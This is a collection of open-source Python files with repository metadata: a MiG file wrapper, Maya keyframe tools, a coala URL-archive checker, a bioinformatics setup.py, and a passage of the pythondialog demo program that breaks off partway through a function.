# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
# Script version (automagically updated by cvs)
"""This file contains a file wrapper interface for server IO. It should
be used as a template for other IO modules that hide the underlying
physical location of server files.
"""
__version__ = '$Revision: 1564 $'
__revision__ = __version__
# $Id: serverfile.py 1564 2006-10-24 14:43:46Z jones $
import fcntl
# File locking states
LOCK_UN = fcntl.LOCK_UN
LOCK_SH = fcntl.LOCK_SH
LOCK_EX = fcntl.LOCK_EX
# File operations
class ServerFile(file):
"""File object wrapper to provide the usual file interface with
local or distributed files underneath. We simply inherit file
operations from builtin file class here. This class should be
subclassed in order to provide remote server file operation.
"""
def __init__(
self,
path,
mode='r',
bufsize=-1,
):
"""Create local file and set default object attributes"""
file.__init__(self, path, mode, bufsize)
def lock(self, mode):
"""Additional method interface to integrate file locking with
file objects.
"""
raise LockingException('This is an interface class! use a subclass and implement locking there!'
)
def unlock(self):
"""Additional method interface to integrate file locking with
file objects.
"""
raise LockingException('This is an interface class! use a subclass and implement locking there!'
)
def __str__(self):
return file.__str__(self)
class LockingException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
|
heromod/migrid
|
mig/shared/serverfile.py
|
Python
|
gpl-2.0
| 2,686
|
[
"Brian"
] |
d9aa4fdb7d70ac22fa8b08215ff8dfc80f0de263fb6f100e41f423371bf234ea
|
'''TB Animation Tools is a toolset for animators
*******************************************************************************
License and Copyright
Copyright 2015-Tom Bailey
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
this script holds a bunch of useful keyframe related functions to make life easier
send issues/ requests to brimblashman@gmail.com
visit tb-animator.blogspot.com for "stuff"
*******************************************************************************
'''
import pymel.core as pm
import tb_timeline as tl
import maya.mel as mel
import maya.cmds as cmds
class keys():
def __init__(self):
pass
def get(self):
pass
@staticmethod
def get_selected_curves():
""" returns the currently selected curve names
"""
return pm.keyframe(query=True, selected=True, name=True)
@staticmethod
def get_selected_keys():
""" returns the currently selected curve names
"""
return pm.keyframe(query=True, selected=True)
@staticmethod
def get_selected_keycount():
return pm.keyframe(selected=True, query=True, keyframeCount=True)
@staticmethod
def get_key_times(curve):
return pm.keyframe(curve, query=True, selected=True, timeChange=True)
@staticmethod
def get_key_values(curve):
return pm.keyframe(curve, query=True, selected=True, valueChange=True)
@staticmethod
def get_key_values_from_range(curve, time_range):
return pm.keyframe(curve, query=True, time=time_range, valueChange=True)
class key_mod():
def __init__(self):
pass
def match(self, data):
## match tangents for looping animations
#
# from tb_keyframe import key_mod
# key_mod().match("start")
# or
# key_mod().match("end")
#
__dict = {'start': True, 'end': False
}
state = __dict[data]
print "state", state
print "mode", data
range = tl.timeline().get_range()
s = range[state]
e = range[not state]
print "start", s, "end", e
animcurves = pm.keyframe(query=True, name=True)
tangent = []
if animcurves and len(animcurves):
for curve in animcurves:
tangent = pm.keyTangent(curve, query=True, time=(s, s), outAngle=True, inAngle=True)
print "tangent", tangent
pm.keyTangent(curve, edit=True, lock=False, time=(e, e),
outAngle=tangent[state], inAngle=tangent[not state])
else:
print "no anim curves found"
class channels():
def __init__(self):
self.gChannelBoxName = mel.eval('$temp=$gChannelBoxName')
pass
def getChannels(self, *arg):
chList = cmds.channelBox(self.gChannelBoxName,
query=True,
selectedMainAttributes=True)
if chList:
for channel in chList:
print channel
else:
print "no channels selected"
return chList
def filterChannels(self):
'''
import filterChannels as ft
reload (ft)
ft.filterChannels()
'''
channels = self.getChannels()
selection = cmds.ls(selection=True)
if selection and channels:
cmds.selectionConnection('graphEditor1FromOutliner',edit=True,clear=True)
for sel in selection:
for channel in channels:
curve = sel+"."+channel
cmds.selectionConnection('graphEditor1FromOutliner',edit=True,object=curve)
def toggleMuteChannels(self):
'''
import filterChannels as ft
reload (ft)
ft.toggleMuteChannels()
'''
channels = self.getChannels()
selection = cmds.ls(selection=True)
if selection and channels:
for sel in selection:
for channel in channels:
curve = sel+"."+channel
cmds.mute(sel+"."+channel,
disable=cmds.mute(sel+"."+channel, query=True))
|
tb-animator/tbtools
|
apps/tb_keyframe.py
|
Python
|
mit
| 4,823
|
[
"VisIt"
] |
968a7b276fcc26ccc7465fcb55c19ae0dc53dc713bb43d3548a6903839527119
|
import requests
from bears.general.URLHeadBear import URLHeadBear
from coalib.bears.LocalBear import LocalBear
from coalib.results.Result import Result
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from dependency_management.requirements.PipRequirement import PipRequirement
from memento_client import MementoClient
class MementoBear(LocalBear):
DEFAULT_TIMEOUT = 15
LANGUAGES = {'All'}
REQUIREMENTS = {PipRequirement('memento_client', '0.6.1')}
AUTHORS = {'The coala developers'}
AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}
LICENSE = 'AGPL-3.0'
CAN_DETECT = {'Documentation'}
BEAR_DEPS = {URLHeadBear}
@staticmethod
def check_archive(mc, link):
"""
Check the link is it archived or not.
:param mc: A `memento_client.MementoClient` instance.
:param link: The link (str) that will be checked.
:return: Boolean, `True` means the link has been archived.
"""
try:
mc.get_memento_info(link)['mementos']
except KeyError:
return False
return True
@staticmethod
def get_redirect_urls(link):
urls = []
resp = requests.head(link, allow_redirects=True)
for redirect in resp.history:
urls.append(redirect.url)
return urls
def run(self, filename, file, dependency_results=dict(),
follow_redirects: bool = True,
):
"""
Find links in any text file and check if they are archived.
Link is considered valid if the link has been archived by any services
in memento_client.
This bear can automatically fix redirects.
Warning: This bear will make HEAD requests to all URLs mentioned in
your codebase, which can potentially be destructive. As an example,
this bear would naively just visit the URL from a line that goes like
`do_not_ever_open = 'https://api.acme.inc/delete-all-data'` wiping out
all your data.
:param dependency_results: Results given by URLHeadBear.
:param follow_redirects: Set to true to check all redirect urls.
"""
self._mc = MementoClient()
for result in dependency_results.get(URLHeadBear.name, []):
line_number, link, code, context = result.contents
if not (code and 200 <= code < 400):
continue
status = MementoBear.check_archive(self._mc, link)
if not status:
yield Result.from_values(
self,
('This link is not archived yet, visit '
'https://web.archive.org/save/%s to get it archived.'
% link),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.INFO
)
if follow_redirects and 300 <= code < 400: # HTTP status 30x
redirect_urls = MementoBear.get_redirect_urls(link)
for url in redirect_urls:
status = MementoBear.check_archive(self._mc, url)
if not status:
yield Result.from_values(
self,
('This link redirects to %s and not archived yet, '
'visit https://web.archive.org/save/%s to get it '
'archived.'
% (url, url)),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.INFO
)
|
refeed/coala-bears
|
bears/general/MementoBear.py
|
Python
|
agpl-3.0
| 3,680
|
[
"VisIt"
] |
4edfa9c68acc1802bcedaf6d2fbcb5ea79fea93ba588a5f37eeab9963c48737d
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='qc18SV4',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.0.2',
description='A quality control pipeline for 18S V4',
long_description=long_description,
# The project's main homepage.
url='https://github.com/hurwitzlab/muscope-18SV4',
# Author details
author='Sarah Hu, Joshua Lynch',
author_email='shu251@gmail.com, jklynch@email.arizona.edu',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='metagenomics quality control',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'biopython'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': ['pytest'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
##package_data={
## 'sample': ['package_data.dat'],
##},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
##data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'pipeline=qc18SV4.pipeline:main',
'write_launcher_job_file=qc18SV4.write_launcher_job_file:main'
],
},
)
|
hurwitzlab/muscope-18SV4
|
setup.py
|
Python
|
mit
| 3,883
|
[
"Biopython"
] |
2517f7de39684b0f80ac7be10db29fe62feaeb9ed392793b9598bdd72a8fc2af
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# demo.py --- Demonstration program and cheap test suite for pythondialog
#
# Copyright (C) 2002-2010, 2013-2016 Florent Rougon
# Copyright (C) 2000 Robb Shecter, Sultanbek Tezadov
#
# This program is in the public domain.
"""Demonstration program for pythondialog.
This is a program demonstrating most of the possibilities offered by
the pythondialog module (which is itself a Python interface to the
well-known dialog utility, or any other program compatible with
dialog).
Executive summary
-----------------
If you are looking for a very simple example of pythondialog usage,
short and straightforward, please refer to simple_example.py. The
file you are now reading serves more as a demonstration of what can
be done with pythondialog and as a cheap test suite than as a first
time tutorial. However, it can also be used to learn how to invoke
the various widgets. The following paragraphs explain what you should
keep in mind if you read it for this purpose.
Most of the code in the MyApp class (which defines the actual
contents of the demo) relies on a class called MyDialog implemented
here that:
1. wraps all widget-producing calls in a way that automatically
spawns a "confirm quit" dialog box if the user presses the
Escape key or chooses the Cancel button, and then redisplays the
original widget if the user doesn't actually want to quit;
2. provides a few additional dialog-related methods and convenience
wrappers.
The handling in (1) is completely automatic, implemented with
MyDialog.__getattr__() returning decorated versions of the
widget-producing methods of dialog.Dialog. Therefore, most of the
demo can be read as if the module-level 'd' attribute were a
dialog.Dialog instance whereas it is actually a MyDialog instance.
The only meaningful difference is that MyDialog.<widget>() will never
return a CANCEL or ESC code (attributes of 'd', or more generally of
dialog.Dialog). The reason is that these return codes are
automatically handled by the MyDialog.__getattr__() machinery to
display the "confirm quit" dialog box.
In some cases (e.g., fselect_demo()), I wanted the "Cancel" button to
perform a specific action instead of spawning the "confirm quit"
dialog box. To achieve this, the widget is invoked using
dialog.Dialog.<widget> instead of MyDialog.<widget>, and the return
code is handled in a semi-manual way. A prominent feature that needs
such special-casing is the yesno widget, because the "No" button
corresponds to the CANCEL exit code, which in general must not be
interpreted as an attempt to quit the program!
To sum it up, you can read most of the code in the MyApp class (which
defines the actual contents of the demo) as if 'd' were a
dialog.Dialog instance. Just keep in mind that there is a little
magic behind the scenes that automatically handles the CANCEL and ESC
Dialog exit codes, which wouldn't be the case if 'd' were a
dialog.Dialog instance. For a first introduction to pythondialog with
simple stuff and absolutely no magic, please have a look at
simple_example.py.
"""
import sys, os, locale, stat, time, getopt, subprocess, traceback, textwrap
import pprint
import dialog
from dialog import DialogBackendVersion
progname = os.path.basename(sys.argv[0])
progversion = "0.12"
version_blurb = """Demonstration program and cheap test suite for pythondialog.
Copyright (C) 2002-2010, 2013-2016 Florent Rougon
Copyright (C) 2000 Robb Shecter, Sultanbek Tezadov
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."""
default_debug_filename = "pythondialog.debug"
usage = """Usage: {progname} [option ...]
Demonstration program and cheap test suite for pythondialog.
Options:
-t, --test-suite test all widgets; implies '--fast'
-f, --fast fast mode (e.g., makes the gauge demo run faster)
--debug enable logging of all dialog command lines
--debug-file=FILE where to write debug information (default:
{debug_file} in the current directory)
-E, --debug-expand-file-opt expand the '--file' options in the debug file
generated by '--debug'
--help display this message and exit
--version output version information and exit""".format(
progname=progname, debug_file=default_debug_filename)
# Global parameters
params = {}
# We'll use a module-level attribute 'd' ("global") to store the MyDialog
# instance that is used throughout the demo. This object could alternatively be
# passed to the MyApp constructor and stored there as a class or instance
# attribute. However, for the sake of readability, we'll simply use a global
# (d.msgbox(...) versus self.d.msgbox(...), etc.).
d = None
tw = textwrap.TextWrapper(width=78, break_long_words=False,
break_on_hyphens=True)
from textwrap import dedent
try:
from textwrap import indent
except ImportError:
try:
callable # Normally, should be __builtins__.callable
except NameError:
# Python 3.1 doesn't have the 'callable' builtin function. Let's
# provide ours.
def callable(f):
return hasattr(f, '__call__')
def indent(text, prefix, predicate=None):
l = []
for line in text.splitlines(True):
if (callable(predicate) and predicate(line)) \
or (not callable(predicate) and predicate) \
or (predicate is None and line.strip()):
line = prefix + line
l.append(line)
return ''.join(l)
class MyDialog:
"""Wrapper class for dialog.Dialog.
This class behaves similarly to dialog.Dialog. The differences
are that:
1. MyDialog wraps all widget-producing methods in a way that
automatically spawns a "confirm quit" dialog box if the user
presses the Escape key or chooses the Cancel button, and
then redisplays the original widget if the user doesn't
actually want to quit.
2. MyDialog provides a few additional dialog-related methods
and convenience wrappers.
Please refer to the module docstring and to the particular
methods for more details.
"""
def __init__(self, Dialog_instance):
self.dlg = Dialog_instance
def check_exit_request(self, code, ignore_Cancel=False):
if code == self.CANCEL and ignore_Cancel:
# Ignore the Cancel button, i.e., don't interpret it as an exit
# request; instead, let the caller handle CANCEL himself.
return True
if code in (self.CANCEL, self.ESC):
button_name = { self.CANCEL: "Cancel",
self.ESC: "Escape" }
msg = "You pressed {0} in the last dialog box. Do you want " \
"to exit this demo?".format(button_name[code])
# 'self.dlg' instead of 'self' here, because we want to use the
# original yesno() method from the Dialog class instead of the
# decorated method returned by self.__getattr__().
if self.dlg.yesno(msg) == self.OK:
sys.exit(0)
else: # "No" button chosen, or ESC pressed
return False # in the "confirm quit" dialog
else:
return True
def widget_loop(self, method):
"""Decorator to handle eventual exit requests from a Dialog widget.
method -- a dialog.Dialog method that returns either a Dialog
exit code, or a sequence whose first element is a
Dialog exit code (cf. the docstring of the Dialog
class in dialog.py)
Return a wrapper function that behaves exactly like 'method',
except for the following point:
If the Dialog exit code obtained from 'method' is CANCEL or
ESC (attributes of dialog.Dialog), a "confirm quit" dialog
is spawned; depending on the user choice, either the
program exits or 'method' is called again, with the same
arguments and same handling of the exit status. In other
words, the wrapper function builds a loop around 'method'.
The above condition on 'method' is satisfied for all
dialog.Dialog widget-producing methods. More formally, these
are the methods defined with the @widget decorator in
dialog.py, i.e., that have an "is_widget" attribute set to
True.
"""
# One might want to use @functools.wraps here, but since the wrapper
# function is very likely to be used only once and then
# garbage-collected, this would uselessly add a little overhead inside
# __getattr__(), where widget_loop() is called.
def wrapper(*args, **kwargs):
while True:
res = method(*args, **kwargs)
if hasattr(method, "retval_is_code") \
and getattr(method, "retval_is_code"):
code = res
else:
code = res[0]
if self.check_exit_request(code):
break
return res
return wrapper
def __getattr__(self, name):
# This is where the "magic" of this class originates from.
# Please refer to the module and self.widget_loop()
# docstrings if you want to understand the why and the how.
obj = getattr(self.dlg, name)
if hasattr(obj, "is_widget") and getattr(obj, "is_widget"):
return self.widget_loop(obj)
else:
return obj
def clear_screen(self):
# This program comes with ncurses
program = "clear"
try:
p = subprocess.Popen([program], shell=False, stdout=None,
stderr=None, close_fds=True)
retcode = p.wait()
except os.error as e:
self.msgbox("Unable to execute program '%s': %s." % (program,
e.strerror),
title="Error")
return False
if retcode > 0:
msg = "Program %s returned exit status %d." % (program, retcode)
elif retcode < 0:
msg = "Program %s was terminated by signal %d." % (program, -retcode)
else:
return True
self.msgbox(msg)
return False
def _Yesno(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return the same exit code as would return
dialog.Dialog.yesno(), except for ESC which is handled as in
the rest of the demo, i.e. make it spawn the "confirm quit"
dialog.
"""
# self.yesno() automatically spawns the "confirm quit" dialog if ESC or
# the "No" button is pressed, because of self.__getattr__(). Therefore,
# we have to use self.dlg.yesno() here and call
# self.check_exit_request() manually.
while True:
code = self.dlg.yesno(*args, **kwargs)
# If code == self.CANCEL, it means the "No" button was chosen;
# don't interpret this as a wish to quit the program!
if self.check_exit_request(code, ignore_Cancel=True):
break
return code
def Yesno(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return True if "Yes" was chosen, False if "No" was chosen,
and handle ESC as in the rest of the demo, i.e. make it spawn
the "confirm quit" dialog.
"""
return self._Yesno(*args, **kwargs) == self.dlg.OK
def Yesnohelp(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return "yes", "no", "extra" or "help" depending on the button
that was pressed to close the dialog. ESC is handled as in
the rest of the demo, i.e. it spawns the "confirm quit"
dialog.
"""
kwargs["help_button"] = True
code = self._Yesno(*args, **kwargs)
d = { self.dlg.OK: "yes",
self.dlg.CANCEL: "no",
self.dlg.EXTRA: "extra",
self.dlg.HELP: "help" }
return d[code]
# Dummy context manager to make sure the debug file is closed on exit, be it
# normal or abnormal, and to avoid having two code paths, one for normal mode
# and one for debug mode.
class DummyContextManager:
def __enter__(self):
return self
def __exit__(self, *exc):
return False
class MyApp:
def __init__(self):
# The MyDialog instance 'd' could be passed via the constructor and
# stored here as a class or instance attribute. However, for the sake
# of readability, we'll simply use a module-level attribute ("global")
# (d.msgbox(...) versus self.d.msgbox(...), etc.).
global d
# If you want to use Xdialog (pathnames are also OK for the 'dialog'
# argument), you can use:
# dialog.Dialog(dialog="Xdialog", compat="Xdialog")
self.Dialog_instance = dialog.Dialog(dialog="dialog")
# See the module docstring at the top of the file to understand the
# purpose of MyDialog.
d = MyDialog(self.Dialog_instance)
backtitle = "pythondialog demo"
d.set_background_title(backtitle)
# These variables take the background title into account
self.max_lines, self.max_cols = d.maxsize(backtitle=backtitle)
self.demo_context = self.setup_debug()
# Warn if the terminal is smaller than this size
self.min_rows, self.min_cols = 24, 80
self.term_rows, self.term_cols, self.backend_version = \
self.get_term_size_and_backend_version()
def setup_debug(self):
if params["debug"]:
debug_file = open(params["debug_filename"], "w")
d.setup_debug(True, file=debug_file,
expand_file_opt=params["debug_expand_file_opt"])
return debug_file
else:
return DummyContextManager()
def get_term_size_and_backend_version(self):
# Avoid running '<backend> --print-version' every time we need the
# version
backend_version = d.cached_backend_version
if not backend_version:
print(tw.fill(
"Unable to retrieve the version of the dialog-like backend. "
"Not running cdialog?") + "\nPress Enter to continue.",
file=sys.stderr)
input()
term_rows, term_cols = d.maxsize(use_persistent_args=False)
if term_rows < self.min_rows or term_cols < self.min_cols:
print(tw.fill(dedent("""\
Your terminal has less than {0} rows or less than {1} columns;
you may experience problems with the demo. You have been warned."""
.format(self.min_rows, self.min_cols)))
+ "\nPress Enter to continue.")
input()
return (term_rows, term_cols, backend_version)
def run(self):
with self.demo_context:
if params["testsuite_mode"]:
# Show the additional widgets before the "normal demo", so that
# I can test new widgets quickly and simply hit Ctrl-C once
# they've been shown.
self.additional_widgets()
# "Normal" demo
self.demo()
def demo(self):
d.msgbox("""\
Hello, and welcome to the pythondialog {pydlg_version} demonstration program.
You can scroll through this dialog box with the Page Up and Page Down keys. \
Please note that some of the dialogs will not work, and cause the demo to \
stop, if your terminal is too small. The recommended size is (at least) \
{min_rows} rows by {min_cols} columns.
This script is being run by a Python interpreter identified as follows:
{py_version}
The dialog-like program displaying this message box reports version \
{backend_version} and a terminal size of {rows} rows by {cols} columns."""
.format(
pydlg_version=dialog.__version__,
backend_version=self.backend_version,
py_version=indent(sys.version, " "),
rows=self.term_rows, cols=self.term_cols,
min_rows=self.min_rows, min_cols=self.min_cols),
width=60, height=17)
self.progressbox_demo_with_file_descriptor()
# First dialog version where the programbox widget works fine
if self.dialog_version_check("1.2-20140112"):
self.programbox_demo()
self.infobox_demo()
self.gauge_demo()
answer = self.yesno_demo(with_help=True)
self.msgbox_demo(answer)
self.textbox_demo()
name = self.inputbox_demo_with_help()
size, weight, city, state, country, last_will1, last_will2, \
last_will3, last_will4, secret_code = self.mixedform_demo()
self.form_demo_with_help()
favorite_day = self.menu_demo(name, city, state, country, size, weight,
secret_code, last_will1, last_will2,
last_will3, last_will4)
if self.dialog_version_check("1.2-20130902",
"the menu demo with help facilities",
explain=True):
self.menu_demo_with_help()
toppings = self.checklist_demo()
if self.dialog_version_check("1.2-20130902",
"the checklist demo with help facilities",
explain=True):
self.checklist_demo_with_help()
sandwich = self.radiolist_demo()
if self.dialog_version_check("1.2-20121230", "the rangebox demo", explain=True):
nb_engineers = self.rangebox_demo()
else:
nb_engineers = None
if self.dialog_version_check("1.2-20121230", "the buildlist demo", explain=True):
desert_island_stuff = self.buildlist_demo()
else:
desert_island_stuff = None
if self.dialog_version_check("1.2-20130902",
"the buildlist demo with help facilities",
explain=True):
self.buildlist_demo_with_help()
date = self.calendar_demo_with_help()
time_ = self.timebox_demo()
password = self.passwordbox_demo()
self.scrollbox_demo(name, favorite_day, toppings, sandwich,
nb_engineers, desert_island_stuff, date, time_,
password)
if self.dialog_version_check("1.2-20121230", "the treeview demo",
explain=True):
if self.dialog_version_check("1.2-20130902"):
self.treeview_demo_with_help()
else:
self.treeview_demo()
self.mixedgauge_demo()
self.editbox_demo("/etc/passwd")
self.inputmenu_demo()
d.msgbox("""\
Haha. You thought it was over. Wrong. Even more fun is to come!
Now, please select a file you would like to see growing (or not...).""",
width=75)
# Looks nicer if the screen is not completely filled by the widget,
# hence the -1.
self.tailbox_demo(height=self.max_lines-1,
width=self.max_cols)
directory = self.dselect_demo()
timeout = 2 if params["fast_mode"] else 20
self.pause_demo(timeout)
d.clear_screen()
if not params["fast_mode"]:
# Rest assured, this is not necessary in any way: it is only a
# psychological trick to try to give the impression of a reboot
# (cf. pause_demo(); would be even nicer with a "visual bell")...
time.sleep(1)
def additional_widgets(self):
# Requires a careful choice of the file to be of any interest
self.progressbox_demo_with_filepath()
# This can be confusing without any pause if the user specified a
# regular file.
time.sleep(1 if params["fast_mode"] else 2)
# programbox_demo is fine right after
# progressbox_demo_with_file_descriptor in demo(), but there was a
# little bug in dialog that made the first two lines disappear too
# early. This bug has been fixed in version 1.2-20140112, therefore
# we'll run the programbox_demo as part of the main demo if the dialog
# version is >= than this one, otherwise we'll keep it here.
if self.dialog_version_check("1.1-20110302", "the programbox demo",
explain=True):
# First dialog version where the programbox widget works fine
if not self.dialog_version_check("1.2-20140112"):
self.programbox_demo()
# Almost identical to mixedform (mixedform being more powerful). Also,
# there is now form_demo_with_help() which uses the form widget.
self.form_demo()
# Almost identical to passwordbox
self.passwordform_demo()
def dialog_version_check(self, version_string, feature="", *, start="",
explain=False):
if d.compat != "dialog":
# non-dialog implementations are not affected by
# 'dialog_version_check'.
return True
minimum_version = DialogBackendVersion.fromstring(version_string)
res = (d.cached_backend_version >= minimum_version)
if explain and not res:
self.too_old_dialog_version(feature=feature, start=start,
min=version_string)
return res
def too_old_dialog_version(self, feature="", *, start="", min=None):
assert (feature and not start) or (not feature and start), \
(feature, start)
if not start:
start = "Skipping {0},".format(feature)
d.msgbox(
"{start} because it requires dialog {min} or later; "
"however, it appears that you are using version {used}.".format(
start=start, min=min, used=d.cached_backend_version),
width=60, height=9, title="Demo skipped")
def progressbox_demo_with_filepath(self):
widget = "progressbox"
# First, ask the user for a file (possibly FIFO)
d.msgbox(self.FIFO_HELP(widget), width=72, height=20)
path = self.fselect_demo(widget, allow_FIFOs=True,
title="Please choose a file to be shown as "
"with 'tail -f'")
if path is None:
# User chose to abort
return
else:
d.progressbox(file_path=path,
text="You can put some header text here",
title="Progressbox example with a file path")
def progressboxoid(self, widget, func_name, text, **kwargs):
# Since this is just a demo, I will not try to catch os.error exceptions
# in this function, for the sake of readability.
read_fd, write_fd = os.pipe()
child_pid = os.fork()
if child_pid == 0:
try:
# We are in the child process. We MUST NOT raise any exception.
# No need for this one in the child process
os.close(read_fd)
# Python file objects are easier to use than file descriptors.
# For a start, you don't have to check the number of bytes
# actually written every time...
# "buffering = 1" means wfile is going to be line-buffered
with os.fdopen(write_fd, mode="w", buffering=1) as wfile:
for line in text.split('\n'):
wfile.write(line + '\n')
time.sleep(0.02 if params["fast_mode"] else 1.2)
os._exit(0)
except:
os._exit(127)
# We are in the father process. No need for write_fd anymore.
os.close(write_fd)
# Call d.progressbox() if widget == "progressbox"
# d.programbox() if widget == "programbox"
# etc.
getattr(d, widget)(
fd=read_fd,
title="{0} example with a file descriptor".format(widget),
**kwargs)
# Now that the progressbox is over (second child process, running the
# dialog-like program), we can wait() for the first child process.
# Otherwise, we could have a deadlock in case the pipe gets full, since
# dialog wouldn't be reading it.
exit_info = os.waitpid(child_pid, 0)[1]
if os.WIFEXITED(exit_info):
exit_code = os.WEXITSTATUS(exit_info)
elif os.WIFSIGNALED(exit_info):
d.msgbox("%s(): first child process terminated by signal %d" %
(func_name, os.WTERMSIG(exit_info)))
else:
assert False, "How the hell did we manage to get here?"
if exit_code != 0:
d.msgbox("%s(): first child process ended with exit status %d"
% (func_name, exit_code))
def progressbox_demo_with_file_descriptor(self):
func_name = "progressbox_demo_with_file_descriptor"
text = """\
A long time ago in a galaxy far,
far away...
A NEW HOPE
It was a period of intense
sucking. Graphical toolkits for
Python were all nice and clean,
but they were, well, graphical.
And as every one knows, REAL
PROGRAMMERS ALWAYS WORK ON VT-100
TERMINALS. In text mode.
Besides, those graphical toolkits
were usually too complex for
simple programs, so most FLOSS
geeks ended up writing
command-line tools except when
they really needed the full power
of mainstream graphical toolkits,
such as Qt, GTK+ and wxWidgets.
But... thanks to people like
Thomas E. Dickey, there are now
at our disposal several free
software command-line programs,
such as dialog, that allow easy
building of graphically-oriented
interfaces in text-mode
terminals. These are good for
tasks where line-oriented
interfaces are not well suited,
as well as for the increasingly
common type who runs away as soon
as he sees something remotely
resembling a command line.
But this is not for Python! I want
my poney!
Seeing this unacceptable
situation, Robb Shecter had the
idea, back in the olden days of
Y2K (when the world was supposed
to suddenly collapse, remember?),
to wrap a dialog interface into a
Python module called dialog.py.
pythondialog was born. Florent
Rougon, who was looking for
something like that in 2002,
found the idea rather cool and
improved the module during the
following years...""" + 15*'\n'
return self.progressboxoid("progressbox", func_name, text)
def programbox_demo(self):
func_name = "programbox_demo"
text = """\
The 'progressbox' widget
has a little brother
called 'programbox'
that displays text
read from a pipe
and only adds an OK button
when the pipe indicates EOF
(End Of File).
This can be used
to display the output
of some external program.
This will be done right away if you choose "Yes" in the next dialog.
This choice will cause 'find /usr/bin' to be run with subprocess.Popen()
and the output to be displayed, via a pipe, in a 'programbox' widget."""
self.progressboxoid("programbox", func_name, text)
if d.Yesno("Do you want to run 'find /usr/bin' in a programbox widget?"):
try:
devnull = subprocess.DEVNULL
except AttributeError: # Python < 3.3
devnull_context = devnull = open(os.devnull, "wb")
else:
devnull_context = DummyContextManager()
args = ["find", "/usr/bin"]
with devnull_context:
p = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=devnull, close_fds=True)
# One could use title=... instead of text=... to put the text
# in the title bar.
d.programbox(fd=p.stdout.fileno(),
text="Example showing the output of a command "
"with programbox")
retcode = p.wait()
# Context manager support for subprocess.Popen objects requires
# Python 3.2 or later.
p.stdout.close()
return retcode
else:
return None
def infobox_demo(self):
d.infobox("One moment, please. Just wasting some time here to "
"show you the infobox...")
time.sleep(0.5 if params["fast_mode"] else 4.0)
def gauge_demo(self):
d.gauge_start("Progress: 0%", title="Still testing your patience...")
for i in range(1, 101):
if i < 50:
d.gauge_update(i, "Progress: {0}%".format(i), update_text=True)
elif i == 50:
d.gauge_update(i, "Over {0}%. Good.".format(i),
update_text=True)
elif i == 80:
d.gauge_update(i, "Yeah, this boring crap will be over Really "
"Soon Now.", update_text=True)
else:
d.gauge_update(i)
time.sleep(0.01 if params["fast_mode"] else 0.1)
d.gauge_stop()
def mixedgauge_demo(self):
for i in range(1, 101, 20):
d.mixedgauge("This is the 'text' part of the mixedgauge\n"
"and this is a forced new line.",
title="'mixedgauge' demo",
percent=int(round(72+28*i/100)),
elements=[("Task 1", "Foobar"),
("Task 2", 0),
("Task 3", 1),
("Task 4", 2),
("Task 5", 3),
("", 8),
("Task 6", 5),
("Task 7", 6),
("Task 8", 7),
("", ""),
# 0 is the dialog special code for
# "Succeeded", so these must not be equal to
# zero! That is why I made the range() above
# start at 1.
("Task 9", -max(1, 100-i)),
("Task 10", -i)])
time.sleep(0.5 if params["fast_mode"] else 2)
def yesno_demo(self, with_help=True):
if not with_help:
# Simple version, without the "Help" button (the return value is
